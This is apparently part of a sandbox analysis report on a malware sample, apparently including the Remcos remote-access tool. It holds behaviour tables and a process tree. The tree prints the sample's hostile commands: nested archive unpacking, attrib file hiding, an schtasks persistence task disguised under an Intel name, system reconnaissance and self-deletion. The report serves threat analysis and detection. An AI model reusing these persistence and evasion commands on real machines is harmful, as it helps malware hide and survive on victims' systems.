| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\onefile_3304_133785001843906793\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\RQ9000R1N7QI" & exit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
